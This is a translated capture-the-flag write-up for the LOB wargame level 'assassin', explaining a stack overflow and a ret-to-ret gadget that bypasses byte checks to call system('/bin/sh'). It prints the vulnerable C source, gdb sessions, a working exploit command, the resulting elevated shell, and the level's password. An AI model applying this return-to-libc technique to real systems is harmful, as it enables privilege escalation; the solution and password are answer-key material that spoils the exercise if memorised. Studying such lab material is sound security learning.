2017. 11. 20. 21:08 · SystemHacking/LOB(BOF원정대)
giant / one step closer
[giant@localhost giant]$ /bin/bash2
[giant@localhost giant]$ export SHELL=/bin/bash2
[ assassin.c ]
#include <stdio.h>
#include <stdlib.h>
#include <string.h>   /* strcpy/memset prototypes; missing from the listing */

int main(int argc, char *argv[])
{
    char buffer[40];

    if(argc < 2){
        printf("argv error\n");
        exit(0);
    }

    if(argv[1][47] == '\xbf')
    {
        printf("stack retbayed you!\n");
        exit(0);
    }                                   // => stack addresses blocked

    if(argv[1][47] == '\x40')
    {
        printf("library retbayed you, too!!\n");
        exit(0);
    }                                   // => library (RTL) addresses blocked

    strcpy(buffer, argv[1]);
    printf("%s\n", buffer);

    // buffer+sfp hunter
    memset(buffer, 0, 44);
}
[ Stack layout ]
  buffer      40 bytes   zeroed by memset
  saved ebp    4 bytes   zeroed by memset
  saved eip              no stack, no RTL
  argc
  argv[0]
* This technique uses neither the stack nor RTL directly; it uses the binary's Data Section instead.
* It relies on the assembly instruction "ret".
First, analyze memory to work out how it can be used.
[giant@localhost giant]$ cp assassin assassin.cp
[giant@localhost giant]$ gdb -q assassin.cp
(gdb) set disassembly-flavor intel
(gdb) disas main
0x8048470 <main>: push %ebp
0x8048471 <main+1>: mov %ebp,%esp
0x8048473 <main+3>: sub %esp,40
... (omitted) ...
0x804851d <main+173>: leave
0x804851e <main+174>: ret
(gdb) b *0x804851d
Breakpoint 1 at 0x804851d
(gdb) run $(python -c 'print "A" * 44 + "BBBB" + "CCCC" + "DDDD"')
Breakpoint 1, 0x804851d in main ()
(gdb) x/24x $ebp-40
0xbffffac0: 0x00000000 0x00000000 0x00000000 0x00000000
0xbffffad0: 0x00000000 0x00000000 0x00000000 0x00000000
                                   saved ebp  saved eip
0xbffffae0: 0x00000000 0x00000000 0x00000000 0x42424242 <-- overwrite with &ret
0xbffffaf0: 0x43434343 0x44444444 0x????????
            &system    xxxx       argv1
[ Stack ]
  saved ebp   0x00000000
  saved eip   &ret (= pop eip, jmp eip)
              &system
              AAAA          <-- junk value
              &"/bin/sh"
Why put a junk value there?
When system is called, its prologue runs:
  push ebp & mov ebp,esp
=> [ Stack ]
     system's saved ebp
     AAAA          <-- ebp+4 ( saved eip )
     &"/bin/sh"    <-- ebp+8 ( argv1 )
=> system( /bin/sh )
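Below is a small Python model, added to this write-up and not part of the original post or the wargame, of the frame layout just described: it applies assassin.c's byte-47 filters and walks main's `leave; ret` plus the extra `ret`, so you can see why the ret-to-ret frame passes while a plain RTL frame is rejected, and what system() finds at [esp] and [esp+4]. The addresses are the ones quoted from gdb on this page; the register/memory walk is a constructed simplification, not a real execution.

```python
import struct

# Addresses quoted from the gdb session on this page (LOB runs without ASLR,
# so they are stable). The memory/register walk below is a constructed model,
# not the wargame's code and not a real execution.
RET_GADGET = 0x0804851E  # main+174: the lone "ret" instruction in .text
SYSTEM = 0x40058AE0      # __libc_system
BIN_SH = 0x400FBFF9      # "/bin/sh" inside libc
BUFFER = 0xBFFFFAC0      # address of buffer[40] (ebp-40 at the breakpoint)

def retbayed(argv1):
    """assassin.c's two filters: they inspect only the top byte of the saved eip,
    which is why a single-byte check is no substitute for bounding the strcpy."""
    if argv1[47] == 0xBF:
        return "stack retbayed you!"
    if argv1[47] == 0x40:
        return "library retbayed you, too!!"
    return None

def run_epilogue(argv1):
    """Model strcpy(buffer, argv1), then main's `leave; ret`, then keep popping
    while eip lands on the ret gadget. Returns (eip, esp, [esp], [esp+4]) at the
    first non-ret target, i.e. what system() sees on entry."""
    mem = {}
    for off in range(0, len(argv1) - 3, 4):
        mem[BUFFER + off] = struct.unpack_from("<I", argv1, off)[0]
    ebp = BUFFER + 40                 # saved-ebp slot sits right after buffer
    esp = ebp + 4                     # leave: mov esp,ebp ; pop ebp
    eip, esp = mem[esp], esp + 4      # ret: pop eip
    while eip == RET_GADGET:          # ret gadget: pop the next word into eip
        eip, esp = mem[esp], esp + 4
    return eip, esp, mem.get(esp), mem.get(esp + 4)

def p32(value):
    return struct.pack("<I", value)

# Constructed frames. RET2RET is the layout the page describes: saved eip -> ret
# gadget, then &system, a junk word that becomes system's return address, then
# &"/bin/sh". PLAIN_RTL puts &system straight into the saved eip.
RET2RET = b"A" * 44 + p32(RET_GADGET) + p32(SYSTEM) + b"AAAA" + p32(BIN_SH)
PLAIN_RTL = b"A" * 44 + p32(SYSTEM) + b"AAAA" + p32(BIN_SH)

if __name__ == "__main__":
    for name, frame in (("plain RTL", PLAIN_RTL), ("ret-to-ret", RET2RET)):
        eip, esp, ret_addr, arg0 = run_epilogue(frame)
        print(name, "filter:", retbayed(frame))
        print("  enters 0x%08x, [esp]=0x%08x, arg0=0x%08x" % (eip, ret_addr, arg0))
```

Both frames end up calling system("/bin/sh"); the only thing the filter sees is the byte at index 47, 0x40 for the libc address versus 0x08 for the .text gadget.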
[ Writing the payload ]
(gdb) p system
$1 = {<text variable, no debug info>} 0x40058ae0 <__libc_system>
[giant@localhost giant]$ /tmp/find <-- source code is in the previous post ( program that locates "/bin/sh" )
"/bin/sh" is at 0x400fbff9
printf /bin/sh
[ &ret ]
[giant@localhost giant]$ ./assassin $(python -c 'print "A" * 44 + "\x1e\x85\x04\x08" + "\xe0\x8a\x05\x40" + "AAAA" + "\xf9\xbf\x0f\x40"')
AAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAAA▒@AAAA▒@
bash$ id
uid=514(giant) gid=514(giant) euid=515(assassin) egid=515(assassin) groups=514(giant)
bash$ my-pass
euid = 515
pushing me away
bash$ whoami
assassin
bash$